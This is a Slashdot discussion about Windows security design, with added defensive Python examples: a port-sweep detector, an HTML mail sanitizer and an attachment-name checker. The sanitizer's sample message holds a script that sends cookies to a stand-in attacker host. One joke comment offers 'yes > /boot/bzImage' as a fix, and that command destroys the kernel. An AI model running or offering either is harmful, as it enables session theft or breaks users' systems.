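    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ kernel: .*?"
    r"SRC=(?P<src>\S+) DST=(?P<dst>\S+) PROTO=(?P<proto>\S+)"
    r"(?: .*?DPT=(?P<dpt>\d+))?")


def parse_line(line):
    """Return the fields of one log line as a dict, or None if it doesn't match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_sweepers(lines, threshold=10):
    """Return {src: [(second, distinct_destinations, busiest_port), ...]} for every
    source that contacted >= threshold distinct hosts within one second."""
    dests = defaultdict(lambda: defaultdict(set))   # src -> second -> {dst}
    ports = defaultdict(Counter)                    # (src, second) -> port counts
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        dests[rec["src"]][rec["ts"]].add(rec["dst"])
        ports[(rec["src"], rec["ts"])][f'{rec["proto"]}/{rec["dpt"]}'] += 1

    findings = {}
    for src, per_second in dests.items():
        hits = []
        for second, targets in sorted(per_second.items()):
            if len(targets) >= threshold:
                port, _ = ports[(src, second)].most_common(1)[0]
                hits.append((second, len(targets), port))
        if hits:
            findings[src] = hits
    return findings


if __name__ == "__main__":
    for src, hits in find_sweepers(build_sample_log()).items():
        for second, n, port in hits:
            print(f"{second}  {src} swept {n} hosts on {port}")
```

Counting distinct destinations rather than raw packets is what keeps a busy but legitimate host (one web server, many packets) from tripping the rule; the busiest port in the same second tells you which worm family to look for on the offending machine.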

  62. Re:Nice to see such a mainstream source getting on by Anonymous Coward · · Score: 2, Interesting

    The question is, do they really care more about the customer or the bottom line?

    The bottom line, obviously.

    I remember reading an article in Dr. Dobbs about a great piece of file indexing code that Microsoft wrote.. it was a great system, bounded resource use, bounded worst-case performance, a nice piece of CS. By the end of the article I learned that it was written TEN YEARS ago and Microsoft sat on it because they didn't need it from a marketing point of view.

    That made me think about how Microsoft operates. They just give out enough to keep customers from leaving. Not one ounce more. That's why Windows is a crappy OS (captive audience, everybody has it on their PC) but the desktop programs are a little higher quality (there is some competition, however tiny).

    Another example: C# is a completely open language, not because MS is generous, but because it's a selling point over Java.

    MS is calculating and ruthless. You'll get security from Microsoft when it starts to be a problem for the bottom line. Not a day sooner.

    And judging by my friends and co-workers nonplussed reactions to these worms/viruses, that day is a long day off...

  63. author confuses poor design with user error by geekee · · Score: 2, Interesting

    Sure Windows has bugs that lend themselves to security problems. But nowhere in the article does he prove that Windows is more insecure than Linux or MacOS. All he can claim is that the default settings on Windows aren't the best choices for security, and that Red Hat and MacOS do a better job. I'd call relying on default settings user error, not a problem with the Windows code itself. You might as well say Solaris is insecure by design since (with Solaris 8 anyway), the default install runs sendmail, allowing spam relaying, and leaves the telnet and ftp ports open, which can result in stolen passwords.

    --
    Vote for Pedro
    1. Re:author confuses poor design with user error by andrewski · · Score: 2, Insightful

      Users want to use computers, not administer them.

      You know, I told the police the same thing the other day. I said "Officer, I don't want to understand gun safety, I just want to shoot things!"

      Maybe this latest round of viruses makes my point for me - using and understanding (or learning about) computers must go hand-in-hand.

  64. Users are forced to run as admin by hirschma · · Score: 4, Insightful

    Users running NT based versions of Windows are effectively forced, or annoyed, into running as admin. This happens for a number of reasons:

    * Old software runs as admin only. Stuff that came out during the DOS/Windows days, much of it pretty recent, simply won't run as anything but admin. This is a nasty legacy thing, and is a vestige of the horrendous design of Win95/98/ME.

    * Too much new software runs as admin. For example, if you want to run Microsoft's own Age of Empires, it only installs as admin, and only runs as admin. This is a new application made by the mothership, and clearly, fits into the home scenario as the article. I'd guess that at least 20% of the apps on my Win2k box require admin rights.

    * Too many housekeeping functions require admin.

    * It is a relative hassle to run a program with admin rights when not admin. The most common way is to right-click on the program's icon, and then select Run As, and then enter the admin password. Ugh.

    * Even for the disciplined, quick user switching allows admin to stay logged in, most likely still running OE or some other security nightmare.

    The upshot is that if a user even understands the concept of not running as admin, they are forced to, or get lazy and do so.

    I've set up several users on Win2k, and taught them about security, and why they really, really don't want to run as admin. Months later, they all are.

    This will be a problem if Linux ever becomes widely adopted by home users, and why Lindows runs as root by default.

    Didn't Apple get this figured out? Why hasn't everyone else copied them as usual?

    Jonathan

  65. OS X is completely locked up... by cfoster611 · · Score: 4, Informative
    In comparison, Mac OS X ships with zero ports open to the Internet.

    Actually, OS X does have (in most systems) some ports/services open by default. Here's a sample portscan with no user-services (ssh,httpd, afp, etc) running.
    Port Scan has started ...

    Port Scanning host: 127.0.0.1

    Open Port: 427
    Open Port: 631
    Open Port: 1033
    1033 is assigned to NetInfo
    427 is "server locator"
    631 is "IPP (Internet Printing Protocol)" ...according to the iana.
    --
    --- Kicking the Cheat since late 2002
  66. Re:If you "trademark" your mail addy... by Geek+of+Tech · · Score: 5, Funny
    I am just trying to figure out how to strike a balance between limiting my exposure to liability in this networked world (because everyone is happy to sue these days) and still participating in society in normal ways.

    Uh, hate to tell you, but unless you're suing somebody you're not participating in society in normal ways.

    --
    Stop the Slashdot effect! Don't read the articles!
  67. Installing Linux - Insecure out of the box- by purduephotog · · Score: 2, Flamebait

    A few years ago there were a few rants because Linux (redhat) wasn't secure out of the box. It shipped with a few packages that had a few exploits- yet the fault fell on the user for not updating their package.
    My grandmother hasn't updated anything on her computer- she's 81 and more concerned with knitting and talking to her grandchildren. I just walked her thru an update.
    Can you imagine if I had to tell her how to do that on linux ?? (without a subscription mind you) - Yeah grandma, type wget -? ...

    Windows Update did- and worked- and fixed it. But it's easier to bash MS for the people whom didn't patch their systems in a timely manner than to target the blame where it ought to be.
    In the past 3 years, since my Grandmother got her computer, how many new Redhat versions have rolled out? How many of those versions would seamlessly install over the other one? I believe the answer is 3 versions and none, Bob.
    Lay off the MS bashing- most of my software I have to use is closed source and several $K per seat- I'm not going to stop using MS until.... well, never. If they move to a different system then I move. I'm tied to the company that writes the code I need to do my job, as are many people in the engineering fields. Leverage one, move the other.

  68. Re: Windows Is 'Insecure By Design,' ... by Little+Brother · · Score: 4, Insightful
    I wonder how many people skip the patches because the EULA's are so obnoxious?

    I wonder how many people read the EULA's? I bet the numbers are related (and small).

    --

    Little Brother, watching the watchers

  69. Re:Nice to see such a mainstream source getting on by smallpaul · · Score: 4, Insightful
    So a friend asks me today to help them install XP. I was reluctant but XP does have some legitimate advantages over Windows 98 and her Windows 98 was crashing. The disk she hands me from the computer store is from 2001. Okay, I'll have to download some patches, I think. She's a modem user. Little did I understand (as a naive Mac/Unix user) that in the time it takes to connect to the Microsoft site I was already infected by TWO virii. Egad! So I downloaded a disinfector and then initialized the firewall. Now I go to see what it takes to download the patches and update. According to Windows Update, she needs *40* security patches and critical updates...totaling over 40MB. Over her freaking dialup modem!

    Okay, maybe I should have turned on the firewall before connecting to the Internet. I didn't realize the virii were scanning so relentlessly and quickly. I also thought that the idea of turning on a software firewall on a brand-new install seems a little dumb. All the firewall does is prevent incoming connections to insecure ports. If Microsoft knew when they shipped the OS that the ports would likely be found insecure, why wouldn't they just turn them off by default? I mean it is one thing to buy Norton Firewall on the presumption that they are fixing Microsoft's broken security model but why would I use a "security fix" that comes on the same CD as the program that introduced the security hole in the first place! It seems totally illogical to me.

  70. New sig file... by MasonMcD · · Score: 4, Interesting

    I now have a new signature on my emails:

    *In light of the ability of some email viruses (eg SoBig.F) to spoof this address regardless of whether my machine is infected or not (for instance, pulling my address from a Windows user address book to use as a fake return address), if this statement is not included, consider a message from me to be a virus*

    I figure that will be good, going out a few dozen times a day. I urge everyone to pen something similar. Cause, ya know, MS can never have too much bad press... erm, room to innovate.

    1. Re:New sig file... by E_elven · · Score: 4, Funny

      Of course, the next big trojan (it's supposed to be called DamnTiny.Bill) will include something like that.

      From: BillG@ms.org
      Subject: I hate you, b1tch!
      Text:
      It was joke. Ahaha.
      Take a look at this. Finest Klatchian
      waterbeetle clock, it's really quite
      humorous.

      *****
      ALL MY EMAIL IS FOLLOWED BY THIS NOTICE.
      IF IT IS NOT PRESENT, BE AWARE THE MAIL
      IS NOT FROM ME AND MAY BE A VIRUS!
      *****

      Attachment: fkwbc34.vbs

      --
      Marxist evolution is just N generations away!
    2. Re:New sig file... by dspeyer · · Score: 4, Informative
      They beat you to it (sorta), Sobig.F contains the line

      X-MailScanner: Found to be clean

      Not sure what it achieves, but it's there.

  71. Re:Insecure by Design by BRTB · · Score: 5, Interesting

    Also fact: System relies on file extensions to differentiate between executable and non-executable files, which in my mind is a bit worse.

  72. Re:MOD PARENT UP, more.. by Flower · · Score: 5, Interesting
    MS chose to enable features as default that did not need to be on most installs. That is an insecure design. To be fair, earlier versions of RH did the same stupid thing and got burned by it. Macs also used to suffer from worms though I don't know why things got better - sorry used to keep up with Macs but not anymore.

    Anyway, as for your requirement for "INTENT." Back when the CodeRed came out, work gave me the responsibility of locking down our IIS servers. Back then I didn't have any experience with IIS so I did the smartest thing I could come up with - started reading and convinced work to send me to a one day SANS seminar. Well, the instructor told a story from an MS employee of how MS figured it was cheaper to enable crap like Internet Printing and the like by default than it was to eat the cost of projected support calls they would get from people who wanted the feature but couldn't figure out how to enable it.

    IOW, enabling everything in IIS was done because it saved MS a few bucks. That is a design decision. It was intentional and most importantly it was insecure.

    You still want to mince words on this?

    --
    I don't want knowledge. I want certainty. - Law, David Bowie
  73. Worse: insecure ON PURPOSE to allow macros etc by Doug+Merritt · · Score: 5, Insightful
    Windows is flawed because it wasn't designed to be secure from the beginning

    True, but far worse: Microsoft quite intentionally continues to make Windows and Office etc insecure on PURPOSE, as a side effect of offering full programmability of email, Excel, etc.

    There wouldn't be any email viruses nor spreadsheet viruses nor Word document viruses if these apps were lobotomized -- if they could not be programmed.

    But Microsoft continually makes the business decision that adding the power of programmability to every app is much more important than the resulting insecurity.

    The vast majority of Linux apps do not allow that kind of programmability -- even when extension languages like Guile/elisp/etc are available in Unix apps, programs aren't automatically and blindly run whenever some hapless user receives email or views a spreadsheet or whatever.

    Conversely, whenever that kind of programmability is added to Unix apps, if it is triggerable just by receiving/viewing a file, then Unix viruses will become far more rampant. (A small saving grace is that the Unix viruses mostly, but not always, will run as some user rather than as root, but this is really only a small issue.)

    This should be a wake-up call to teams like Gnumeric; just yesterday on Slashdot Gnumeric was criticized for not supporting every single MS Excel feature, and Jody Goldberg replied that hopefully it would include those by next year. But any Unix app that is 100% compatible with a MS app will be virus prone!

    Quote from a poster on that story:

    Worksheet functions are great, but a lot of Excel's draw comes from its embedded VBA. Companies that rely on workbooks with embedded VBA probably wont be willing to switch to Gnumeric until it has support for VBA, or something very similar.

    Mmm-hmm, and there goes security.

    (Story link: Gnumeric Now Supports All Excel Worksheet Functions )

    The really sad thing is that the marketplace clearly agrees with Microsoft about this tradeoff: corporate and personal users are far more concerned with having the power of macros/Visual Basic/etc built in to everything than with even basic security.

    --
    Professional Wild-Eyed Visionary
  74. If IE / Outlook ran in their own account.... by tjstork · · Score: 4, Interesting

    With write privileges only to their own sandbox, then, none of this would be happening. Instead, you've got IE and Outlook running as a user's account, so, despite the prevalence of a workable user based access control list based security system in Windows, Microsoft does not use it where it really counts. Dumb dumb dumb.

    --
    This is my sig.
  75. Hey.... by Theatetus · · Score: 2, Funny
    All I got was weird colors on my screen...

    But my friend said to patch it by doing

    yes > /boot/bzImage

    Sure hope that works....

    --
    All's true that is mistrusted
  76. The main problem with windows is the users.. by Ramion · · Score: 5, Insightful

    Today I sat down at my computer when I got a MSN message from a friend. That friend is a complete noob with computers and now he had a problem.

    This is pretty much what was said:
    Friend: Hey. I got a problem with my computer. It has shut itself two times today, without me doing something. What do you think is wrong? I heard something about a virus.

    Me: Yeah there are a few major viruses flowing around the net right now. Have you patched your system?

    Friend: Patched ? ?

    Me: Yeah. You know downloaded updates for windows.

    Friend: No..

    Me: Oh well. Here is a link to a virus scanner try and run that first. .... After awhile, me trying to explain him how to scan for viruses. Yeah! It found a virus named blaster and I THINK he got it removed...

    Me: Good now to update your system. .... I, after awhile, get him pointed to the windows update and the patch for blaster. Again I think he got it installed ....

    Me: So, Now I suggest you update your system with patches from windows update.

    Friend: Why? What should I waste time download all that? What good does it do me ?

    Me: Well... It secures your system, gives you updates to windows programs and IE and new drivers. You know. Makes it up to date.

    Friend: But how do I do it ? .... I try to explain to him how to use windowsupdate but am almost giving up since he just doesn't get that he just has to press scan for updates and then install updates. Well in the end he gives up and says he doesn't care ....

    And there is the entire windows Security problem. Users that just come to their computer to surf a bit and download a few programs like kazaa or emule just don't feel the need for updates. And they end up spreading the viruses to the entire net. Oh.. And it doesn't help that MS doesn't allow pirate versions of windows to be updated fully. I can see why it would in a sense suck for them to give free updates to people that haven't paid for the system. But people don't get updates when it's all blocked. Which in the end leads to viruses like this running wild.

  77. Another example of Windows' designed insecurity by xigxag · · Score: 2, Insightful

    Outlook Express 6 SP1 now comes with a setting to "read all messages in plain text", which is how I have my system configured and which gets rid of approximately 100% of email viruses. But unless you happen to be fiddling around with the configuration of OE, you'd never know this setting exists. If anything, Microsoft should be prominently advertising this "new, free" feature (which of course ain't new, it's elm-level functionality) as a way to protect your system, but they won't.

    Sure, but most people like their email with pretty colors. Then, fine, they should do what Poco Mail does, automatically "sanitize" email by stripping potentially harmful HTML coding and external image downloading (i.e. webbugs) while allowing basic HTML formatting to be read. This is not rocket science, but MS seems to be irresponsibly holding back on such basic safety improvements.

    --
    There are two kinds of people: 1) those who start arrays with one and 1) those who start them with zero.
    1. Re:Another example of Windows' designed insecurity by Ravenseye · · Score: 2, Informative

      And that's about as basic as it gets. E-mail is text. Anything else is unnecessary. Why people just HAVE to use lazy-HTML is completely beyond me. People should use Pegasus or some other compliant mailer...at least to keep life sane for those of us who otherwise give a damn.
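
The stripping that comment 77 describes (drop scripts and other active content, refuse external image fetches, keep basic formatting, or fall back to reading the message as plain text), as an added Python example. This is editorial example code, not Poco Mail's or Outlook Express's logic and not from any poster in this thread; the tag and attribute allowlists, the rule that only cid: (message-embedded) images may be shown, and the sample message are my own assumptions, constructed for the demonstration.

```python
"""Sanitize an HTML e-mail body: keep basic formatting, drop active content,
never fetch external images. Editorial example, not any mail client's code."""
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Formatting allowed to survive (assumption: a reasonable allowlist, not the
# one any particular mail client ships).
ALLOWED_TAGS = frozenset({
    "p", "br", "b", "i", "u", "em", "strong", "a", "img", "ul", "ol", "li",
    "blockquote", "font", "span", "div", "table", "tr", "td", "th", "h1", "h2", "h3",
})
ALLOWED_ATTRS = {
    "a": {"href"}, "font": {"color", "size", "face"},
    "img": {"src", "alt", "width", "height"}, "td": {"colspan", "rowspan"},
}
VOID_TAGS = frozenset({"br", "img", "hr"})
# Containers whose whole content is dropped, not just the tag itself.
DROP_WITH_CONTENT = frozenset({"script", "style", "iframe", "object", "embed",
                               "applet", "form", "head", "noscript"})
SAFE_LINK_SCHEMES = frozenset({"http", "https", "mailto", ""})   # "" = relative


def scheme_of(value):
    """Scheme of a URL after removing whitespace and control characters, which
    browsers ignore and which attackers use to disguise 'javascript:'."""
    compact = "".join(ch for ch in value if ch.isprintable() and not ch.isspace())
    try:
        return urlsplit(compact).scheme
    except ValueError:
        return "invalid"


class MailSanitizer(HTMLParser):
    def __init__(self, allowed_tags=ALLOWED_TAGS):
        super().__init__(convert_charrefs=True)   # entities are decoded before we look
        self.allowed = allowed_tags
        self.out = []
        self.skip = 0            # >0 while inside a dropped container
        self.blocked_images = 0
        self.removed = []        # audit trail of what was stripped

    def _clean_attrs(self, tag, attrs):
        kept = []
        for name, value in attrs:
            value = value or ""
            if name.startswith("on") or name == "style":      # event handler / CSS trick
                self.removed.append(f"{tag}@{name}")
                continue
            if name not in ALLOWED_ATTRS.get(tag, ()):
                continue
            if name == "href" and scheme_of(value) not in SAFE_LINK_SCHEMES:
                self.removed.append(f"a@href:{scheme_of(value)}")
                continue
            kept.append(f' {name}="{escape(value, quote=True)}"')
        return "".join(kept)

    def handle_starttag(self, tag, attrs):
        if tag in DROP_WITH_CONTENT:
            self.skip += 1
            self.removed.append(tag)
            return
        if self.skip:
            return
        if tag == "img":
            # Only images embedded in the message itself (cid:) may be shown;
            # anything fetched over the network is a web bug until proven otherwise.
            src = dict(attrs).get("src") or ""
            if scheme_of(src) != "cid":
                self.blocked_images += 1
                self.out.append("[external image blocked]")
                return
        if tag not in self.allowed:
            return                          # unknown tag dropped, its text kept
        self.out.append(f"<{tag}{self._clean_attrs(tag, attrs)}>")

    def handle_endtag(self, tag):
        if tag in DROP_WITH_CONTENT:
            self.skip = max(0, self.skip - 1)
        elif not self.skip and tag in self.allowed and tag not in VOID_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.skip:
            self.out.append(escape(data) if self.allowed else data)


def sanitize(html, allowed_tags=ALLOWED_TAGS):
    """Return (clean_html, report)."""
    s = MailSanitizer(allowed_tags)
    s.feed(html)
    s.close()
    return "".join(s.out), {"blocked_images": s.blocked_images, "removed": s.removed}


def plain_text(html):
    """'Read all messages in plain text': no tags at all survive."""
    return sanitize(html, allowed_tags=frozenset())[0]


# Constructed sample message: a web bug, a script, an event handler and a
# javascript: link next to legitimate formatting and an inline (cid:) image.
SAMPLE_MAIL = """<html><head><style>body{}</style></head><body>
<p>Hi <b>there</b>,</p>
<script>document.location='http://evil.example/'+document.cookie</script>
<img src="http://tracker.example/bug.gif?id=42" width="1" height="1">
<img src="cid:logo@local" alt="logo">
<a href="javascript:alert(1)" onclick="steal()">click</a>
<a href="https://www.example.com/">site</a>
<p style="position:absolute">Regards</p>
</body></html>"""
```

Because HTMLParser decodes character references in attribute values before the handler sees them, `&#106;avascript:` is caught by the same scheme check as a mixed-case or whitespace-padded `javascript:`; the report dictionary gives the mail reader something to show the user instead of silently rendering a cleaned message.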

  78. Attachments = risk is not 'common sense' by lpontiac · · Score: 2, Insightful

    From the article:

    Not opening strange e-mail attachments helps to keep Windows secure (not to mention it's plain common sense), but it isn't enough.

    I use mutt to read most of my mail (years ago, I used pine.) Opening strange attachments isn't an issue for me, and shouldn't be for anyone else. If there is executable code in an attachment .. my client will show me executable code, it sure as hell won't run it. That's common sense.

  79. long week for windows users is right. by htmlboy · · Score: 3, Informative

    it's dorm move-in weekend at the university where i work. after looking at a sample of the machines brought to school by students given the privilege of early move-in (ra's, mainly), we found that less than 5% of our students were patched for both blaster/lovesan and welchia/naichi. as such, it was decided that shutting off the entire residence hall network would be easier than shutting off ~95% of the ports once they got infected (typically takes 3-5 seconds in this environment). so our student workers and a few full-timers like me get to make our way to every single student machine (~8,000 students in the dorms) and analyze, clean, patch, and install a current virus scanner.

    overtime is great.

  80. No problems here. by AllDigital · · Score: 2, Insightful

    First off, let me say that I KNOW that Linux and BSD are a lot more stable than Windows...but in the real world...where family and associates need to be spoon fed, Windows is what is in use. I have had absolutely no problems with any of the recent outbreaks. BECAUSE, I ensure that the computers under my care are current with updates (after I evaluate them) and that firewalls are properly configured.....and yes, I even talk to the users and ensure that they know that there is some new bad thing out there. Nothing personal, but do not whine about Windows if the real problem is that you expect your users to take care of everything themselves. I don't expect them to, and I am happy to help them without making them feel stupid. That is why I am still employed and happy at my job.

  81. Laggy bundles by Anonymous Coward · · Score: 2, Insightful

    At least the version of XP provided to PC manufacturers is refreshed once a quarter or so -- and Microsoft says it's working to shorten this lag.

    Why does that lag exist at all? I realise Microsoft has built its fortune by masquerading software as a tangible good, but we're talking like one CD to each vendor. They're just copying an install onto hard drives and pushing them out the door, so why aren't they kept up-to-date? Couple the in-factory lag with that on already-boxed inventory and the OS that first boots up can be ages-old - and it's probably already attached to a hostile wire.

  82. Just listen please.... by Genjurosan · · Score: 4, Insightful

    Your reply is the best so far; however, just take a step back and listen to my point.

    Do you think we should write an article that claims that Henry Ford invented the automobile as a device to kill people 'by design'?

    People get in vehicles drunk and run into families of four, killing them all. Do you think that this unintentional side effect was, 'by design' when the engineers created the vehicle? Was it 'by design' when man created beer or wine?

    I think I'm being treated VERY unfairly by most responses here.

    I give you one more example.

    When the hammer was designed, do you think the designer intended it to be used to kill people? Or how about the baseball bat?

    This is being over-analyzed by so many techies that I think the clear facts are being missed. That is, the article is misleading and doesn't contain a fair wording of facts. Put yourself in the shoes of others. Take a breath and look at my point.

    1. Re:Just listen please.... by 1010011010 · · Score: 4, Insightful
      Do you think we should write an article that claims that Henry Ford invented the automobile as a device to kill people 'by design'?

      No, that would be the same as saying "Operating systems are insecure by design." What the article says is, "Windows is insecure by design." This is like saying "the Suzuki Samurai is unsafe by design." Damned thing tips over way too easy.

      Here's an example I posted elsewhere about Windows being "insecure by design":

      Well, he could have mentioned a true "Insecure by Design" flaw in Windows: the fact that Windows determines that a file is executable based on its *name*. If a file ends in .exe, .vbs, .bat, .scr, or one of lots of other extensions, Windows assumes it's executable and will load and run it when the user clicks on it. Or a "shell" command references it, etc.

      On Unix and unix-like systems, one has to explicitly mark a file as executable before the OS will try to run it, and it's even possible to deny the "execute" permission to an entire filesystem (for instance, users' read-write home directories).


      the article is misleading

      Not really.

      --
      Napster-to-go says "Fill and refill your compatible MP3 player", which is a lie. It's not MP3. It's WMA with DRM.
    2. Re:Just listen please.... by Genjurosan · · Score: 2, Insightful

      No, that would be the same as saying "Operating systems are insecure by design." What the article says is, "Windows is insecure by design." This is like saying "the Suzuki Samurai is unsafe by design." Damned thing tips over way too easy. So this leads me back to perspectives and how we understand language.

      If the Suzuki Samurai is unsafe because it tips over too easy, I would write it as:

      "The Suzuki Samurai is unsafe because of the way it was designed."

      Not,

      "The Suzuki Samurai is unsafe by design."

      To me, the first method indicates that the design carries with it a low value of safety. The second indicates that there was intent to design the Samurai as an unsafe vehicle.

      Semantics again...
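
A worked illustration of the point in reply 82.1, added here and not part of the original thread: Windows decides from the name, so the same helper that flags a dangerous attachment also shows what a double extension, a trailing dot, or a Unicode right-to-left override does to that decision and to what Explorer displays with extensions hidden; the Unix side asks the inode's mode bits instead. The executable-extension list is an illustrative subset I chose, not the registry's full list, and the attachment names are constructed.

```python
"""Windows decides 'is this executable?' from the file name; Unix from the
mode bits. Editorial example, not any product's code."""
import os
import stat
import tempfile

# Extensions the Windows shell hands to a loader or interpreter when clicked.
# Assumption: an illustrative subset, not the full registry/PATHEXT list.
EXEC_EXTENSIONS = frozenset({
    ".exe", ".com", ".bat", ".cmd", ".scr", ".pif", ".vbs", ".vbe", ".js",
    ".jse", ".wsf", ".wsh", ".hta", ".msi", ".cpl", ".lnk",
})
RLO = "\u202e"   # Unicode RIGHT-TO-LEFT OVERRIDE, legal in Windows file names


def windows_stored_name(name):
    """Win32 silently strips trailing spaces and dots when the file is created,
    so 'readme.txt.exe. ' is stored, and later executed, as 'readme.txt.exe'."""
    return name.rstrip(" .")


def windows_extension(name):
    return os.path.splitext(windows_stored_name(name))[1].lower()


def windows_would_execute(name):
    """True if Explorer/ShellExecute would run this file rather than open it."""
    return windows_extension(name) in EXEC_EXTENSIONS


def explorer_display_name(name):
    """What the user sees with 'Hide extensions for known file types' on: the
    final (registered) extension vanishes, so 'invoice.pdf.scr' shows as
    'invoice.pdf'."""
    stored = windows_stored_name(name)
    root, ext = os.path.splitext(stored)
    return root if ext.lower() in EXEC_EXTENSIONS else stored


def apparent_name(name):
    """Approximate what a bidi-aware UI renders: text after an RLO mark is
    drawn reversed (handles the single-override case only)."""
    if RLO not in name:
        return name
    head, tail = name.split(RLO, 1)
    return head + tail[::-1]


def attachment_verdict(name):
    """Mail-gateway style verdict on an attachment name."""
    stored = windows_stored_name(name)
    root, ext = os.path.splitext(stored)
    flags = []
    if windows_would_execute(name):
        flags.append("executable-by-name")
    if "." in root.lstrip("."):
        flags.append("double-extension")
    if stored != name:
        flags.append("trailing-junk-stripped")
    if RLO in name:
        flags.append("bidi-override")
    return {
        "stored": stored,
        "displayed": explorer_display_name(name),
        "apparent": apparent_name(stored),
        "executes": windows_would_execute(name),
        "flags": flags,
    }


def unix_is_executable(path):
    """Unix asks the inode, not the name: is any execute bit set?"""
    mode = os.stat(path).st_mode
    return bool(mode & (stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH))


def unix_demo():
    """Same bytes, same scary name: not executable until someone chmods it.
    (On a Windows host, Python derives st_mode from the extension, which is
    the very behaviour the comment complains about.)"""
    with tempfile.TemporaryDirectory() as d:
        path = os.path.join(d, "invoice.pdf.exe")
        with open(path, "wb") as f:
            f.write(b"MZ\x90\x00")          # constructed: looks like a PE header
        os.chmod(path, 0o644)
        before = unix_is_executable(path)
        os.chmod(path, 0o755)
        after = unix_is_executable(path)
    return before, after
```

Mounting a filesystem noexec, which the reply also mentions, is a step beyond the mode bits: the kernel then refuses to execute the file even when the bits are set, which a name-based check can never express.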

  83. Another response to that silly argument. by Alethes · · Score: 2, Insightful

    If Windows is attacked because it's popular, then why isn't Apache spreading more worms than IIS since it has 60% of the webserver market?

  84. Re:Market Share? by 0x0d0a · · Score: 2, Insightful

    You want QA on your kernels done by a QA team, you go to a distro vendor. The kernel was released by Linus, not by any vendors. That's the rough equivalent of doing a beta release.

    Search for IIS on SecurityFocus's vulnerability database if you want a list of IIS holes. There are many.

  85. Conspiracy theory by bokmann · · Score: 5, Interesting

    I'm late to the party with this reply, but I'm posting it anyway for posterity. Someday I'll find this message and link back to it.

    Windows IS insecure by design. The Virii and worms that are happening now are pissing people off. In the future, Microsoft will bring the 'security' scheme from the XBox to Windows... code will have to be signed by Microsoft in order to run on Windows. The press will love it, and you will see tons of articles saying things like "Microsoft gets Security Right" and "Microsoft Announces the End of Virii".

    And in the end, you and I won't be allowed to fire up a compiler and write a trivial little 'Hello World' program without buying a runtime license from Microsoft, which will be embeded in every program you write.

    Innovation will be stifled... I doubt Microsoft will be very license-friendly to Sun, or Apache, or Cygwin, etc.

    Microsoft's own lax security is a plan to pave the way to their heavy handed takeover of your computer.

    mark my words.

    1. Re:Conspiracy theory by toddestan · · Score: 2, Interesting

      Even if they bring a security level like that to the PC, do you think that they won't manage to somehow screw it up to the point where there will be dozens of exploits that people can use to make the machine run any code they want?

      I mean, take a look at the X-box. Microsoft controls both the hardware and the software, and people have managed to run anything they want on unmodified X-Boxes.

    2. Re:Conspiracy theory by westyvw · · Score: 2, Interesting

      People ought to Mod this up. To the TOP. You are right, at least in the sense that MS wants you to use apps over the internet, paying for each usage. They also want you to store the files remotely, on their servers. What better way to be secure and protect their intellectual development.

      What people don't realize is that this IS SPELLED out CLEARLY (yeah I am yelling) in their internal documents, and is the future they want. I have read articles about this many times. You may be off a little by suggesting that they will use a security trump card, but I wouldn't bet you are far off. This is the future if we (well not me, this message comes from a comp using Suse Linux) continue to use MS products.

  86. In other news... by swtaarrs · · Score: 2, Funny

    It has been recently discovered that the Pope is Catholic. Who knew?!

  87. Perhaps I'm doing something wrong... by ScottGant · · Score: 5, Insightful

    I'm not an XP lover, but it's the OS that's on my computer. It just is. I play games and run Photoshop and other programs...so I use XP because my favorite programs all run on this OS on fairly cheap hardware.

    Now, I may be doing something wrong here, but I've NEVER had a virus. I've never had a problem with a worm or anything really. XP hasn't even crashed on me before....ever. I've had programs hang up or crash...but the OS itself hasn't crashed.

    And this has been the same on the 2 different machines that I've run XP on.

    But yet, I always hear about everyone raking XP and Windows across the coals all the time. Yet I've never ever experienced nor do I know anyone anyone that's ever had major problems with XP. Oh, I know people out there have problems...but it's just that I personally have never known any.

    Why is that? Now, as I said, I'm not an XP zealot at all. I could take it or leave it. But after reading here on Slashdot the evils of Windows and XP it would seem that my machine should have burst into flames months ago, yet it's going on day after day, never turned off, always hooked to the net...and chugging right along.

    And I'm not really doing anything special. I keep up with all the updates to XP...which takes about 2 minutes out of my week. And I have basic Norton Antivirus running. I have Seti@home running when I'm away from the machine and I do a disk clean up and defragment maybe once a month or so.

    So again, I must be doing something wrong (or right) to where XP doesn't give me one iota of problem.

    I'm not praising XP...at least I don't mean to be praising it. You only see people bashing Windows, never praising it. To praise it would mean being thrown out of geekdom. So I think if XP or NT is working for you, you keep your mouth shut or just talk about how great Linux is.

    I guess your mileage may vary.

    --

    "Music is everybody's possession. It's only publishers who think that people own it." - John Lennon.
    1. Re:Perhaps I'm doing something wrong... by naelurec · · Score: 4, Informative

      It's all a matter of perspective. It seems like Windows NT/2k/XP works pretty well for knowledgeable end users (which you seem to be one of...). I have a W2K box that as a box works pretty well at what it does (though it does have some rather strange memory related problems .. but not nasty enough to justify a re-install...) However, at least for me, after running Linux, Mac OS X and now FreeBSD as my primary desktop, I have a different perspective on how an operating system should work. I actually find the *nix desktops to be easier to work with. Not only are there a lot more cool features (ie Mozilla has lots of neat features over Internet Explorer, same with KDE vs Explorer, etc..) but the entire system seems laid out much more logically. When programs install on my FreeBSD box, I know exactly what files it has installed and where (not to mention it is really easy to remove ALL the related files compared to the add/remove feature in Windows). I can quickly find what applications are running, I have a lot more information available to me as far as what is going on "under the hood" and most importantly, I can access all critical features on a fast SSH connection instead of trying VNC or some other cumbersome GUI interface. So what's my point? Well I suppose when my Windows using buddies, relatives and customers call me with yet_another_windows_problem (sobig, blaster, other viruses, adware, whatever..) I tend to think "well if they were running *nix, would they have this problem? (usually not)" and "if they were running *nix, I could simply SSH to their box and fix the problem in a few minutes instead of explaining how to setup VNC over the phone and trying to troubleshoot it remotely (with their side being a 28.8k dial up connection) or hopping in my car and physically sitting in front of the computer and hacking away at it." What's my point? I dunno. I guess I have found the *nix systems to be generally better than the Microsoft offerings. Since using *nix, I have different expectations of how my computer should work and at this time, Microsoft does not meet these expectations. In fact, when I am using Windows boxes, I have found that I get frustrated with the machine because it doesn't work like I am used to.

    2. Re:Perhaps I'm doing something wrong... by westlake · · Score: 2, Informative
      The msblast worm seems to have been for most folks a non-event.

      The Symantec W32.Blaster.Worm Removal Tool has been downloaded about 131,000 times through Download.com, which is probably a fair measure of the scale of the infection.

      ---but, in comparison, Kazaa was downloaded 2,678,000 times last week alone.

